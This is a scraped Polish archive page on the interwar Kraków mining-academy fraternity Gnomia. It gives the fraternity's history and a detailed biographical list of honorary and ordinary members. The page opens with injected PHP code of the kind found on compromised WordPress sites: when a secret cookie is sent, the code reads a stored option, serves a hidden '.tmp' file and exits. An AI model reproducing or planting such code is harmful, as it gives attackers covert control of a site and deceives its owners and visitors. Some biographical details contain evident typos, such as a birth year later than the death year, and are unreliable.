if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Gnomia

Dekiel Frydolina Bury Nazwa:
Korporacja Studnetów Akademii Górniczej Gnomia
Siedziba:
Kraków
Data powstania:
4 VI 1923 r.
Barwy:
zielona – złota – czarna
Dewiza:
„Salus Reipublicae suprema lex” („Dobro Państwa najwyższym prawem”)

Rys historyczny

Uroczystości III-lecia Gnomii, Kraków 6 VI 1926 r.

Gnomia została założona z inicjatywy członków Korporacji Lechia Mariana Schroedera i Łucjana Kleina, którzy dnia 4 VI 1923 r. zaprzysięgli i nadali barwy pierwszemu Prezydium Korporacji.

Sztandar Gnomii.

Gnomia była korporacją wydziałową, a wszyscy członkowie korporacji byli studentami Wydziału Górniczego Akademii Górniczej. Kultywowała zwyczaje i tradycje polskich związków studenckich ze szkół górniczych z Loeben i Freiberga. Ojcem Korporacyjnym był hrabia Włodzimierz Dzieduszycki. Od dnia 15 I 1924 r. kandydowała w Związku Polskich Korporacji Akademickich (data starszeństwa związkowego: 15 I 1924 r.), a dnia 4 VI 1924 r. uzyskała prawa członka rzeczywistego. Była organizatorem Krakowskiego Koła Międzykorporacyjnego oraz sprawowała opiekę nad nowopowstałymi korporacjami krakowskim Montaną, Laudą, Praetorią oraz Capitolią.

Poczet sztandarowy Gnomii w pochodzie, Rynek w Krakowie, lata 30-te (?).

Kartele zawarła z K! Lechia z Poznania (dnia 13 VI 1925 r. trzyletni, dnia 9 VI 1933 r. piętnastoletni, który po upływie tego czasu miał przejść w wieczysty) oraz K! Chrobacja z Warszawy (dnia 5 V 1927 r. trzyletni, w marcu 1937 r. zamieniony na wieczysty).

Gnomia, lata 30-te.

Całkowita ustalona, choć niekompletna imienna lista członków obejmuje 152 nazwiska, w tym 16 członków honorowych. W 1938 r. liczyła 115 członków, w tym 15 członków honorowych.

Po wojnie odbywały się nieoficjalne spotkania niewielkiej grupy członków Gnomii.

Lista członków

Poniższa, niekompletna lista członków Gnomii obejmuje niemal sto pięćdziesiąt nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

 1. Edmund Chromiński, (8 listopada 1974 w Rykach k. Siedlec - 11 września 1954 w Krakowie) s. Teofila, absolwent Gimnazjum Św. Anny w Krakowie, student Wydziału Filozoficznego UJ, student i absolwent Wydziału Budowy Maszyn PL, inż. mechanik 1901, po studiach asystent w Wiedeńskim Stowarzyszeniu Dozoru Kotłów w Wiedniu 1901-02, drugi inspektor kotłowy w Oddziale Kraków Stowarzyszenia Dozoru Kotłów 1900-14 oraz 1917-19, w zarządzie Warszawskiego Stowarzyszenia Dozoru Kotłów 1919-21, prof. kontraktowy AG 1921-22, prof. zw., kierownik Katedry Maszynoznawstwa, dziekan Wydziału Hutniczego 1923-25, rektor 1925-27, prorektor 1927-29, Filister honorowy Gnomii, więzień obozu koncentracyjnego Oranienburg i Sachsenhausen 1939-40, prof. AG i AGH 1945-54
 2. Henryk Czeczott, (18 czerwca 1875 w Petersburgu - 6 września 1928 we Freibergu) absolwent Gimnazjum w Petersburgu, absolwent Instytutu Górniczego w Petersburgu 1900, pracownik kopalni “Saturn” w Czeladzi, w kopalniach Pensylwanii i Illinois, “Jan” w Dąbrowie Górniczej, dysertacja Instytut Górnictwa w Petersburgu 1909, docent, kierownik, prof. nadzw. i prof. zw. w Katedrze Przeróbki Mechanicznej 1910-22, m.in. dziekan Wydziału Górniczego 1917-19, prof. AG 1922-28, m.in. kierownik Katedry Górnictwa I i Przeróbki Mechanicznej, dziekan Wydziału Górniczego 1926/27, Filister honorowy Gnomii
 3. Franciszek Drobniak, (25 luty 1870 w Jaworznie - 11 czerwca 1943 w Krakowie) s. Jakuba, absolwent Szkoły Realnej w Krakowie, absolwent Akademii Górniczej w Loeben 1894, inż. ruchu kopalnia “Orłowa” w Łazach 1895-98, dyrektor kopalni “Brzeszcze 1899-1910, studia w Ecole de Mines w Paryżu 1910-12, właściciel Krakowskiej Fabryki Szczoteczek 1912-43, porucznik art. 1920, wykładowca AG 1920-39, Filister honorowy Gnomii
 4. Włodzimierz hr. Dzieduszycki, (10 maja 1885 we Lwowie - 9 września 1971 w Warszawie) s. Tadeusza i Anny z hr. Dzieduszyckich, absolwent Gimnazjów w Sankt Petersburgu oraz w Krakowie, student PL i UJ, od 1918 IV ordynat Ordynacji Dzieduszyckich, opiekun Muzeum Przyrodniczego im. Dzieduszyckich we Lwowie, w czasie wojny polsko-bolszewickiej zorganizował na własny koszt oddział z Zarzecza, działacz Stronnictwa Narodowego oraz organizacji ziemiańskich, Filister honorowy Leopolii oraz Gnomii, autor słów do “Kurdesza korporacyjnego”, w 1944 usunięty przez komunistów z maj. w Zarzeczu, po wojnie osiadł w Warszawie, pracował w Instytucie Zoologii PAN, autor prac z zakresu ornitologii i muzealnictwa, odznaczony francuskim orderem d’Officier du Mérite agricole 1924
 5. Aleksander Folusiewicz (Falusiewicz), inż., radca górniczy, Filister honorowy Gnomii, w 1938 w Krakowie
 6. Ferdynand Jastrzębski, inż., radca górniczy, Filister honorowy Gnomii, w 1938 w Krakowie
 7. Józef Kiedroń, (23 marca 1879 w Błędowicach Dolnych (obecnie Hawierzowa) na Śląsku Cieszyńskim - 25 stycznia 1932 w Berlinie), inż. górnik, prezes i członek rad nadzorczych kopalń, w 1931 dyrektor Huty Królewskiej i Laura w Katowicach, działacz narodowy i oświatowy na Śląsku Cieszyńskim, w 1918 zainicjował powstanie Rady Narodowej Śląska Cieszyńskiego oraz opracował projekt przyłączenia tej dzielnicy do Polski, minister Przemysłu i Handlu w gabinecie Władysława Grabskiego 1923-25, Filister honorowy Gnomii i Silesii, pochowany na ewangelickim Cmentarzu w Cieszynie
 8. Jan Konrad Eligard Krauze, (11 września 1882 w Rakowiczach - 10 listopada 1969 w Krakowie) absolwent II Gimnazjum w Kijowie, student Wydziału Fizyczno-Matematycznego Uniwersytetu Kijowskiego oraz Wydziału Mechanicznego Politechniki Kijowskiej, student i absolwent Wydziału Budowy Maszyn PL 1905-1907, doktorat PL 1912, od 1920 wykładowca AG, prof. zw. 1922, rektor 1924-26, dziekan Wydziału Górniczego AG 1927-30, Filister honorowy Gnomii, uwięziony w obozie koncentracyjnym w Wiśniczu 1939-40, po wojnie kierownik Katedry Maszynoznawstwa I AG 1945-65, dziekan Wydziału Elektromechanicznego 1946-50, od 1960 na emeryturze
 9. Jan Modzelewski, inż., w 1938 dyrektor Biura Prób, Miar i Wag we Lwowie, Filister honorowy Gnomii
 10. Jan Naturski, (15 maja 1887 w Nawojowej Górce k. Krzeszowic - 18 listopada 1936 w Lipince), absolwent Gimnazjum Realnego we Lwowie, student i absolwent Akademii Górniczej w Loeben 1906-10, po studiach pracował w Towarzystwie Przedsiębiorstw Górniczych “TePeGe”, m.in. jako inż. ruchu, kierownik ruchu, dyrektor techniczny, członek zarządu, kierownik kopalń 1913-33, przedstawiciel i specjalista robót wiertniczych i torpedowania otworów wiertniczych 1933-36, Filister honorowy Gnomii, zginął tragicznie w kopalni “Jutrzenka” w wypadku na skutek przedwczesnego wybuchu torpedy
 11. Oskar Nowotny, (28 listopada 1875 w miejsc. Trzyniec - 1969 w Rotenmann w Austrii) s. Ferdynanda, absolwent Szkoły Realnej w Cieszynie, student i absolwent Akademii Górnicej w Loeben 1894-98 (inż. górnik 1897, inż. hutnik 1898), po studiach m.in. inż. ruchu w hucie Vareś w Bośni, kopalni miedz w Maskara w Bośni, hucie miedzi Sinjako, adiunkt w Katedrze Górnictwa Akademii Górniczej w Loeben 1901-14 oraz 1919-20, w I wojnie światowej por. kolejowy w armii austriackiej, prof. kontraktowy AG 1920-21, prof. zw. 1921-39, Filister honorowy Gnomii i Montany, kierownik 1939 i referent 1939-44 w Statistisches Amt w Krakowie, po wojnie w Austrii, od 1945 na emeryturze
 12. Gustaw Różycki, (14 stycznia 1892 w Suchej Beskidzkiej - 2 marca 1975 w Bytomiu) absolwent Gimnazjum im. Nowodworskiego w Krakowie, student i absolwent Wyższej Szkoły Górniczej w Leoben w Austrii 1911-19, w czasie I wojny światowej w armii austriackiej, po studiach pracownik kopalń w okręgach krakowskim i dąbrowskim, przedstawiciel firmy wytwarzającej maszyny górnicze braci Eickhoff 1925-33, w 1933 zakupił wytwórnię maszyn i narzędzi górniczych, nazwaną przez siebie “Moj”, firma zwiększyła zatrudnienie od 15 osób w 1933 do 800 w 1939 (produkowano m.in. narzędzia, elektryczne silniki, wentylatory, motocykle marki “Moj”), Filister honorowy Gnomii, w czasie II wojny światowej w konspiracji, w 1940 aresztowany, więzień obozów koncentracyjnych 1940-45, po wojnie m.in. dyrektor działu zaopatrzenia maszynowego w Centrali Zaopatrzenia Materiałowego Przemysłu Węglowego w Katowicach, dyrektor techniczny wrocławskiej Fabryki Maszyn Elektrycznych, kierownik budowy kopalń “Halemba” i “Nowy Wirek” w Rudzkim Zjednoczeniu Przemysłu Węglowego w Bytomiu, kierownik pracowni a później generalny projektant w Biurze Projektów Górniczych w Katowicach, od 1962 na emeryturze, autor usprawnień i wynalazków
 13. Izydor Stella-Stawicki, (5 kwietnia 1881 we Lwowie - 19 grudnia 1957 w Krakowie) s. Jana i Izydory z d. Zarzycka, absolwent Wydziału Inżynierii PL 1904, asystent Katedra Budowy Mostów i Statyki Konstrukcji Budowlanych PL 1903-04, pracownik instytucji publicznych, m.in. adiunkt przy budowie dróg wodnych w Ministerstwie Handlu we Lwowie 1906-07, kierownik regulacji górnej Płetwi oraz kierownik robót przy obwałowaniu Wisły w Biurze Melioracyjnym Krajowego we Lwowie 1907-18, od 1921 wykładowca AG, prof. nadzw. 1922, prof. zw. 1936-57, aresztowany w 1939, więzień obozu koncentracyjnego w Oranienburgu 1939-40, wykładowca i dziekan Wydziału Mierniczego Szkoły Górniczo-Hutniczo-MIerniczej w Krakowie 1940-44, kierownik Katedry Budownictwa i Inżynierii AG 1945-57, prorektor Wydziałów Politechnicznych AGH 1951-56
 14. Jan Studniarski, (21 marca 1876 w Szamotułach - 25 stycznia 1946 w Krakowie) s. Feliksa, absolwent Gimnazjum Marii Magdaleny w Poznaniu, student politechnik w Stuttgarcie, Berlinie, Hanowerze, dyplom 1902 doktorat 1905 Politechnika w Hanowerze, po studiach m.in. docent w Wojskowej Akademii Technicznej 1907-09, kierownik Kolei Elektrycznej w Tarnowie 1912-14, II prezydent Poznania 1919, prof. zw. i kierownik Katedry Elektrotechniki AG 1920-39, dziekan Wydziału Hutniczego 1921-22, rektor 1922-24, prorektor 1924-26, Filister honorowy Gnomii, aresztowany 1939, obóz koncentracyjny w Sachsenhausen 1939-40, prof. AG 1945-46
 15. Edward Windakiewicz (junior), (8 września 1858 w Pecs - 12 lipca 1942 w Krakowie) s. Edwarda, studia górnicze w Loeben i Przybramie, dyplom 1882, pracownik m.in. kopalni ropy naftowej “Schodnica” oraz “Męcina Wielka” k. Gorlic, kopalni soli “Żupy” w Wieliczce, inicjator nowej kaplicy św. Kingi, radca ds. górnictwa w Ministerstwie Skarbu w Wiedniu 1905-06 oraz w Ministerstwie Robót Publicznych w Wiedniu 1906-18, pracownik Polskiej Komisji Likwidacyjnej i Wyższego Urzędu Górniczego, wykładowca AG 1922-39, autor monumentalnego dzieła “Solnictwo”, dr honoris causa AG 1936, Filister honorowy Gnomii, w 1939 aresztowany wraz z innymi profesorami wyższych uczelni Krakowa, uniknął wywozu do obozu koncentracyjnego, zwolniony
 16. Jan Zarański, (27 maja 1866 w Krakowie - 14 kwietnia 1940 w Warszawie) absolwent Gimnazjum Św. Jacka w Krakowie, absolwent Wydziału Prawa UJ 1890, student i absolwent Akademii Górniczej w Loeben 1891, pracownik Ministerstwa Rolnictwa w Wiedniu 1891-1918, w tym m.in. radca górniczy, naczelnik Wojewódzkiego Urzędu Górniczego w Krakowie 1909-13 oraz w Drohobyczu 1913-18, poseł do austriackiej Rady Państwa 1907-18, członek Komitetu Organizacyjnego AG w Krakowie 1913-22, prof. zw. i kierownik Katedry Prawa Górniczego AG 1921-31, poseł na Sejm RP 1928-30, Filister honorowy Gnomii

Członkowie rzeczywiści

 1. Tadeusz Albrycht, (5 września 1900 w Toczynie - prawd. po 1979), s. Kazimierza, absolwent Gimnazjum Klasycznego w Rzeszowie, student i absolwent (inż. górnik) Wydziału Górniczego AG 1919-25, założyciel Gnomii, po studiach pracownik m.in. kopalni “Wujek” w Katowicach, “Śląsk” w Łagiewnikach, “Jankowice” w Boguszowicach, “Śląsk” w Świętochłowicach, “Ludwik” w Zabrzu, kierownik działu inwestycji Mikołowskiego Zjednoczenia Przemysłu Węglowego 1946-51, inspektor Departamentu Inwestycji w Ministerstwie Górnictwa i Energetyki oraz Zjednoczenia Budownictwa Górniczego w Katowicach
 2. Aleksander Anasiewicz, (26 luty 1903 w Cieninie - 28 sierpnia 1974 w Katowicach) s. Józefa, absolwent Gimnazjum Matematyczno-Przyrodniczego im. Tadeusza Kościuszki, student i absolwent (inż. górnik) Wydziału Górniczego AG, po studiach prawnik m.in. kopalni “Maks” Michałkowicach, kopalni “Lithandra” w Nowym Bytomiu Okręgowego Urzędu Górniczego w Chorzowie, w czasie wojny w więzieniu na Montelupich w Krakowie oraz obozu w Płaszowie 1944, po wojnie m.in. w Instytucie Mechanizacji Górnictwa w Katowicach 1953-55, w kierownictwie Głównego Instytutu Górnictwa w Katowicach 1955-70, wykładowca w Katedrze Bezpieczeństwa Pracy AGH 1954-70, kierownik Katedry 1955-69, doktorat 1969, prof. nadzw. AGH 1965
 3. Władysław Bałabuszyński, student AG 1923-26, wystąpił z Korporacji

  Zdzisław Bąbka, 1938 r.

 4. Zdzisław Bąbka 5 stycznia 1918 w Młodzianach - prawd. po 1979 ?) prawd. s. Józefa (urzędnika) i Bronisławy z Gajdów, brat Zenona (Chrobria), absolwent Gimnazjum w Radomsku, student i absolwent Wydziału Hutniczego AG 1935-48, akt. 1938-39, wiceprezes sem. let. 1938/39, szef produkcji 1948-49 oraz dyrektor techniczny 1949-50 Fabryki Lin i Drutu w Sosnowcu, inż. Centrali MPC w Warszawie, od 1963 starszy projektant w Biurze Studiów i Projektów Rozwoju Przemysłu Maszynowego “Promaz” w Warszawie

 5. Stanisław Bielczyk, student AG, później student UP (?) lub WSH (?) w Poznaniu, c. 1930, akt. 1930-31, skreślony z Korporacji
 6. Marian Bogatyński, student AG 1930-31, c. 1930, akt. 1930-31
 7. Zbigniew Bolechowski - Grajdek, (12 października 1908 w Zawierciu - 18 sierpnia 1942 w Auschwitz) absolwent Gimnazjum im. W. Łukasińskiego w Dąbrowie Górniczej, student Wydziału Górniczego AG 1928-35, akt. 1930-31, sekretarz 1930 i 1931, wiceprezes sem. zim. 1930/31, po studiach starszy górnik 1935-36, sztygar 1936-37, kierownik wentylacji w kopalni “Rymer”, w wojnie obronnej 1939 w Armii “Śląsk”, w niewoli niemieckiej, uciekł z obozu w Krakowie, aresztowany 13 grudnia 1940 na Śląsku przez Gestapo, zesłany do obozu koncentracyjnego Auschwitz, rozstrzelany za ucieczkę kilku więźniów

  Ferdynand Boruszczak, 1938 r.

 8. Ferdynand Teodor Boruszczak, (19 czerwca 1909 w Tuzli w Jugosławii - 4 sierpnia 1970 w Krakowie) s. Teodora, absolwent Gimnazjum Matematyczno-Przyrodniczego Stefana Batorego w Warszawie, student Akademii Górniczej w Loeben, student i absolwent (inż. górniczy) Wydziału Górniczego AG 1931-49, akt. 1938-39, w wojnie obronnej 1939 w walkach od Oświęcimia do Lwowa, w 1942 uwięziony przez Niemców jako zakładnik, w więzieniu na Montelupich, a później w obozie koncentracyjnym w Auschwitz, adiunkt w Kopalni Doświadczalnej “Barbara” w Mikołowie 1946-51, projektant w Biurze Projektów Przemysłu Cementowego i Wapiennego w Krakowie 1951-55, Biurze Projektów Kopalnictwa Surowców Chemicznych w Krakowie 1956-59, Biurze Studiów i Projektów Przemysłu Kruszyw i Surowców Mineralnych w Krakowie 1959-62 oraz 1964-65, inż. przy eksploatacji i przeróbce surowców mineralnych w Tunezji 1962-64, od 1965 na rencie inwalidzkiej

 9. Zbigniew Bukowski, (15 luty 1907 w Krzeszowicach - 5 lipca 1962 w Rudzie Śląskiej) s. Zygmunta, absolwent Gimnazjum Humanistycznego w Zakopanym, student i absolwent Wydziału Górniczego AG 1926-46, akt. 192?-39, pracownik techniczny S.A. “Godula” w Katowicach 1936-39, po wojnie pracował w kopalniach “Paweł” i “Pokój” w Rudzie Śląskiej
 10. Frydolin Alojzy Bura, (15 luty 1914 w Karwinie - 11 października 2009) s. Franciszka, student i absolwent Gimnazjum Klasycznego im. Adama Mickiewicza w Katowicach, student i absolwent Wydziału Górniczego AG 1932-37 (mgr inż.), c. 1933, po akt. 1933-39, studiach pracował w kopalniach Hohenegger Karwina, “Kleofas” w Katowicach, dyrektor kopalni “Katowice” w Katowicach 1947-49, “Prezydent” w Chorzowie 1949-50, “Polska” w Świętochłowicach 1950-51, “Bobrek” w Bytomiu 1951-54, “Miechowice” w Bytomiu 1954-56, inspektor kopalń, główny i naczelny inż. górniczy Jaworznicko-Mikołowskiego Zjednoczenia Przemysłu Węglowego w Mysłowicach, członek SITG, pochowany na cmentarzu w Katowicach Panewnikach

  Zygmunt Butler

 11. Zygmunt Butler, (5 października 1910 we Lwowie - prawd. po 1979) s. Zygmunta, absolwent Gimnazjum w Jarosławiu, student i absolwent Wydziału Górniczego 1929-36, akt. 1930-32, sekretarz sem. zim. 1931/32 (od grudnia), wiceprezes 1932, po studiach kierownik biura górniczego “Gazolina” SA we Lwowie 1936-39, uczestnik wojny obronnej 1939, jeniec oflagów XI A i II C 1939-45, studia w kopalniach w USA 1946/47, zastępca kierownika wydziału normowania 1947-48 oraz zastępca kierownika wydziału usprawnień technicznych 1948-50 w Centralnym Zarządzie Przemysłu Węglowego w Katowicach, starszy inspektor górniczy w Centralnym Zarządzie Budownictwa Węglowego 1950-55, kierownik działu górnictwa w Centralnym zarządzie Budowy Kopalń w Katowicach 1955-57, od 1957 w Ministerstwie Górnictwa i Energetyki, w tym naczelnik wydziału mechanizacji w Departamencie Techniki 1957-58, naczelnik wydziału mechanizacji, główny inż. ds. techniki, główny specjalista w Departamencie Górnictwa 1958-68, adiunkt i główny specjalista w Zakładach Konstrukcyjno-Mechanizacyjnych Przemysłu Węglowego 1968-69, od 1969 główny inż. ds. postępu technicznego Bytomskiego Zjednoczenia Przemysłu Węglowego, wykładowca i prof. AGH

 12. Władysław Chaciński, student AG 1928-31, akt. 192?-31, skreślony
 13. Zbigniew Corradini, student AG 1926, akt. lata 20-te, wystąpił z Korporacji
 14. Tadeusz Czajkowski, (1902-1991) inż.
 15. Kamil Czarnecki, student AG 1930- , c. 1930, akt. 1930-31
 16. Włodzimierz Czermiński, student i absolwent AG lata 30-te, akt. 1938-39
 17. Czesław Czerski, (21 sierpnia 1900 w Czeladzi - 31 lipca 1975 w Katowicach) s. Mikołaja, absolwent Szkoły Realnej w Będzinie, student Wydziału Inżynierii PW, student i absolwent Wydziału Górniczego AG 1921-26, założyciel Gnomii, pracownik kopalni, m.in. ‘Richter” w Siemianowicach, “Ferdynand” w Katowicach, “Mysłowice”, zastępca dyrektora kopalni Dębieńsko” w Czerwionce 1936-39, uczestnik wojny obronnej 1939, później pracował w kopalni Eti Bank w Turcij 1939-40, żołnierz PSZ w Palestynie 1940-41, później pracował jako kierownik w kopalniach złota Bengol w Indiach 1941-42 oraz jako kierownik kopalń w Afganistanie 1942-45, naczelny inż. pięciu kopalń węgla firmy Birla Bross Kalkuta 1945-47, kierownik działu eksploatacji złóż w Ministerstwie Górnictwa i Energetyki w Katowicach 1947-50, inspektor inwestycji kopalń w Banku Inwestycyjnym w Katowicach, generalny projektant kopalni cynku i ołowiu “Biprometu” 1953-67
 18. Alojzy Dutkowski, (1913 - 21 stycznia 1994 w Offenbach w Niemczech) student i absolwent AG 1933-49/50, akt. 1938-39, pracownik, a w latach 50-tych wiceprezes Państwowego Instytutu Górniczego w Warszawie, w latach 70-tych pracownik departamentu górnictwa w Izraelu
 19. Tadeusz Dziubiński, (2 stycznia 1917 w Częstochowie -1997) s. Ignacego, absolwent Gimnazjum im. H. Sienkiewicza w Częstochowie, student Wydziału Górniczego AG 1937-48, c. 1938, akt. 1938-39, młodszy asystent AG 1945-48, pracownik kopalni “Gigant”, “Ludwik” w Zabrzu, “Concordia” w Zabrzu, naczelny inż. 1954-57 oraz dyrektor 1957-60 kopalni “Rokitnica” w Bytomiu, dyrektor kopalni “Ludwik-Concordia” w Zabrzu 1960-69, od 1970 inspektor górniczy Zabrzańskiego Zjednoczenia Przemysłu Węglowego
 20. Karol Fabris, (11 kweitnia 1902 w Köszeg na Węgrzech - 1982) s. Antoniego, absolwent Szkoły Realnej w Bielsku, student i absolwent Wydziału Górniczego AG 1920-25, założyciel Gnomii, po studiach m.in. pracownik kopalni “Giesche” w Janowie Śląskim 1931-39, dyrektor techniczny w Chorzowskim Zjednoczeniu Przemysłu Węglowego 1945-46, naczelny dyrektor Zabrzańskiego Zjednoczenia Przemysłu Węglowego 1946-47, dyrektor techniczny 1949-53 oraz dyrektor naczelny Jaworznicko-Mikołowskiego Zjednoczenia Przemysłu Węglowego w Mysłowicach, podsekretarz stanu Ministerstwa Górnictwa i Energetyki w Katowicach 1957-70, od 1971 przewodniczący Rady Techniczno-Ekonomicznej
 21. Wilhelm Feber, student AG 1936-3?, c. 1938, akt. 1938-39
 22. Henryk Fik, student AG 1937-39, c. 1938, akt. 1938-39, skarbnik sem. let. 1938/39
 23. Bronisław Gadomski, ( - przed 1939) brat Andrzeja, Stanisława i Wacława (wszyscy trzej Chrobacja), brat stryjeczny Felicjana (Chrobacja, Gnomia) oraz Tadeusza (Gnomia), Stefana (Chrobacja), student WSH Warszawa, c. 1930, akt. 1930-31
 24. Felicjan Józef Gadomski, (2 czerwca 1898 w Dąbrowie Górniczej - 4 października 1974 w Katowicach) s. Felicjana Izydora, brat Stefana (Chrobacja) i Tadeusza (Gnomia), brat stryjeczny Bronisława (Gnomia) oraz Andrzeja, Stanisława i Wacława (wszyscy trzej Chrobacja), absolwent Gimnazjum im. Mikołaja Reja w Warszawie, student PW, uczestnik wojny polsko-bolszewickiej 1920, student i absolwent AG 1923-31, założyciel Chrobacji, akt. 1928-31, później w Korporacji Gnomia, c. 1930, inicjator kartelu Gnomii z Chrobacją, po studiach w kopalniach “Prezydent” i “Barbara-Wyzwolenie” w Chorzowie, “Eleonora-Befina” na Śląsku Cieszyńskim, uczestnik wojny obronnej 1939, później w PSZ na Zachodzie, por. w 4 Dywizji Strzelców 1940, I Brygadzie Spadochronowej 1940-42, w 318 Dywizjonie Myśliwsko-Rozpoznawczym na Środkowym Wschodzie i we Włoszech 1942-46, po powrocie do kraju kierownik kontroli inwestycji w Zabrzańskim Zjednoczeniu Przemysłu Węglowego 1947, inspektor, zastępca naczelnika i dyrektor Okręgowego Urzędu Górniczego w Gliwicach 1948-55, główny projektant Biura Projektów Metali Nieżelaznych “Biproment” w Katowicach 1955-57, inspektor bhp w Zjednoczeniu Górniczo-Hutniczych Metali Nieżelaznych w Katowicach oraz w Jaworznicko-Mikołowskich Zjednoczenia Przemysłu Węglowego w Mysłowicach 1957-63, tłumacz w Ośrodku Branżowym Informacji Technicznej i Ekonomicznej Głównego Instytutu Górniczego w Katowicach 1963-66
 25. Tadeusz Gadomski, (7 stycznia 1904 w Dąbrowie Górniczej - 1998) s. Felicjana, brat Stefana (Chrobacja) i Felicjana (Chrobacja, Gnomia), brat stryjeczny Bronisława (Gnomia), Andrzeja, Stanisława i Wacława (wszyscy trzej Chrobacja), absolwent Gimnazjum Humanistycznego Mikołaja Reja w Warszawie, student i absolwent Wydziału Górniczego AG 1922-30, c. 1924, prezes 1928, prezes Krakowskiego Koła Międzykorporacyjnego sem. let. 1927/28, pracownik kopalni “Flora” w Dąbrowie Górniczej, inspektor kopalń w Chorzowskim Zjednoczeniu Przemysłu Węglowego 1945-48, później w Przedsiębiorstwie Budowy Płytkich Kopalń Przemysłu Węglowego w Katowicach 1954-58 oraz w Jaworznicko-Mikołowskim Zjednoczeniu Przemysłu Węglowego w Mysłowicach 1958-70
 26. Stefan Galantowicz, (10 lipca 1905 w Gnieźnie - luty 1945) s. Michała, absolwent Gimnazjum w Gnieźnie, student Wydziału Górniczego AG 1925-35, akt. ok. 1926, wystąpił z Korporacji, po studiach pracował m.in. Jako inż. w Dyrekcji Dróg w Krakowie 1936-37, jako inż.. Ruchu w Państwowych Kamieniołomach w Sarnach 1937-38 oraz w Żupie Solnej w Wieliczce 1938-39, inż. ruchu w kopalni “Brzeszcze” w Brzeszczach 1939-44, aresztowany 1944 i osadzony w obozie koncentracyjnym w Auschwitz, a następnie w Mauthausen, gdzie zgładzony

  Wiesław Gawroński, 1938 r.

 27. Wiesław Gawroński, (4 lipca 1910 w Piotrkowie Trybunalskim - 1940 w Charkowie) s. Władysława i Stefanii z Mertzów, absolwent II Gimnazjum Humanistycznego w Piotrkowie, student i absolwent Wydziału Hutniczego AG 1929-38, c. 1930, akt. 1930-39, sekretarz Zarządu Koła Starych Strzech 1939, asystent ruchu Huty Cynku w Bogucicach, absolwent Szkoły Podchorążych Rezerwy Artylerii we Włodzimierzu Wołyńskim 1934, ppor. rez. 2 Pułku Artylerii Lekkiej Legionów, w niewoli sowieckiej, zamordowany przez NKWD

 28. Witold Geisler (Gajzler), (23 lutego 1902 w Warszawie - 1940 (?) w Warszawie) s. Edmunda, absolwent Gimnazjum im. Jędrzeja Śniadeckiego w Kielcach, student i absolwent Wydziału Hutniczego AG 1922-31, nauczyciel w Gimnazjum Mechanicznym oraz w Szkole Zawodowej Dokształcającej w Brześciu n/Bugiem 1931-39, uczestnik wojny obronnej 1939, aresztowany 15 stycznia 1940 w Nieborowie, zginął na Pawiaku w Warszawie

  Roman Grabianowski

 29. Roman Grabianowski, (25 czerwca 1899 w Poznaniu - październik 1979 w Chorzowie) s. Michała (urzędnika pocztowego) i Marii, brat Konrada (Chrobria), powstaniec wielkopolski, żołnierz WP 1919-20, działacz społeczny na terenie Poznania, Berlina, Niemiec i Górnego Śląska (plebiscyt), absolwent Szkoły Realnej Bergera w Poznaniu, student Politechniki w Berlinie, student i absolwent Wydziału Górniczego AG 1922-26, założyciel Gnomii, pracownik kopalni “Orzeł Biały” w Szarleju, “Giesche” w Janowie, “Prezydent” w Królewskiej Hucie, dyrektor administracyjny Chorzowskiego Zjednoczenia Przemysłu Węglowego 1945-47, później dyrektor administracyjny Katowickiego Zjednoczenia Przemysłu Węglowego 1947-48, dyrektor techniczny w Przedsiębiorstwie Materiałów Posadzkowych Przemysłu Węglowego w Katowicach 1948-49, zastępca dyrektora technicznego Bytomskiego Zjednoczenia Przemysłu Węglowego 1950-52, naczelny dyrektor Dąbrowskiego Zjednoczenia Przemysłu Węglowego 1953-54, dyrektor generalny Ministerstwa Górnictwa w Katowicach 1955-63, pełnomocnik Rządu ds. szkód górniczych 1963-67, przewodniczący Miejskiego Komitetu SD w Chorzowie, radny miejski, odznaczony m.in. Orderem Sztandaru Pracy II kat., Krzyżami Oficerskim i Komandorskim OOP, Złotym Krzyżem Zasługi, Wielkopolskim Krzyżem Powstańczym (uzupełnienie biogramu o dane z nekrologu Tomasz Otocki)

 30. Jan Marian Grabowski, (22 luty 1901 w Krakowie - prawd. po 1979) absolwent II Szkoły Realnej w Krakowie, student i absolwent Wydziału Hutniczego AG 1921-25, założyciel Gnomii, asystent Katedry Walcownictwa i Maszynoznawstwa Hutniczego 1924-25, pracownik m.in. Huty Żelaza “Milowice” w Milowicach, Zakładów Metalurgicznych “Giesche” w Katowicach, kierownik Zakłądu Kadmu w Szopienicach 1929-38, uczestnik wojny obronnej 1939, więzień niemieckich obozów jenieckich 1939-45, po wojnie m.in. ekspert techniczny dla kontroli inwestycji przemysłowych w Banku Gospodarstwa Krajowego w Krakowie 1947-53, w Banku Inwestycyjnym w Krakowie 1959-60, generalny projektant Biura Projektów Przemysłu Cementowego i Wapiennego w Krakowie 1960-70, od 1970 na emeryturze

  Jan Grzybała, 1935 r.

 31. Jan Bolesław Grzybała, (30 lipca 1914 w Krakowie - 28 lipca 1985 w Kielcach) s. Franciszka i Leokadii z d. Krassowska, absolwent Gimnazjum oo. Pijarów w Rakowicach k. Krakowa 1933, student Wydziału Górniczego AG 1933-39, akt. 1938-39, absolwent Szkoły Podchorążych Rezerwy we Włodzimierzu Wołyńskim 1938, zmobilizowany w sierpniu 1939, w wojnie obronnej 1939 w 5 Pułku Artylerii Ciężkiej Armii Kraków, internowany na Węgrzech, po ucieczce z obozu w początkach 1940 dostał się do Francji, a później Wielkiej Brytanii, żołnierz Brygady Spadochronowej gen. Sosabowskiego, po wypadku oddelegowany na studia górnicze i inżynierii cywilnej na Uniwersytecie w Birmingham, w 1946 jako por. inż. wrócił do Polski, pracował jako kierownik odbudowy tunelu k. Miechowa, kierownik budowy fabryki płyt pilśniowych w Koniecpolu, naczelny inż. w Państwowym Przedsiębiorstwie Budowlanym w Kielcach, naczelny inż. Biura Projektów w Kielcach 1954-58, od 1958 do emerytury kierownik Ośrodka Naukowo-Badawczego w Kielcach (filia Instytutu Techniki Budowlanej w Warszawie), rzeczoznawcza budowlany, tlumacz techniczny języka angielskiego, odznaczony m.in. Złotym Krzyżem Zasługi, pochowany w grobie rodzinnym na cmentarzu w Cedzynie k. Kielc

